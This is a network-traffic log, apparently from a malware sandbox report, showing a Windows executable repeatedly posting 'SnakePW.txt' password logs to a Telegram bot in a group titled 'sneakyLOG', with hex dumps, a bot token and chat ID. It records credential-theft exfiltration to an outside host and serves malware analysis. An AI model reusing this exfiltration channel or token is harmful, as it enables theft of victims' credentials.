2024-09-27 10:53:29 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce5c42c66f75a Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:29 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 35 63 34 32 63 36 36 66 37 35 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce5c42c66f75aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:29 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:29 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:29 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 30 39 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36915,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434409,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	49765	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:30 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce60ec1e5a41d Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:30 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 36 30 65 63 31 65 35 61 34 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce60ec1e5a41dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:30 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:30 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:30 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 31 30 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36916,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434410,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	49766	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:31 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce6595a48f150 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:31 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 36 35 39 35 61 34 38 66 31 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce6595a48f150Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:31 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:31 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:31 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 31 31 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36917,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434411,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	49767	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:32 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce6a815037598 Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:32 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 36 61 38 31 35 30 33 37 35 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce6a815037598Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:32 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:32 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:32 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 31 32 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36918,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434412,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	49768	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:33 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce6fc2b798d31 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:33 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 36 66 63 32 62 37 39 38 64 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce6fc2b798d31Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:33 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:33 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:33 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 31 33 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36919,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434413,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	49769	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:34 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce74d56b39fdd Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:34 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 37 34 64 35 36 62 33 39 66 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce74d56b39fddContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:35 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:34 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:35 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 31 34 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36920,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434414,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	49770	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:35 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce7ce6df8c10a Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:35 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 37 63 65 36 64 66 38 63 31 30 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce7ce6df8c10aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:35 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:35 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:35 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 31 35 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36921,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434415,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	49771	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:36 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce7fb87142c6b Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:36 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 37 66 62 38 37 31 34 32 63 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce7fb87142c6bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
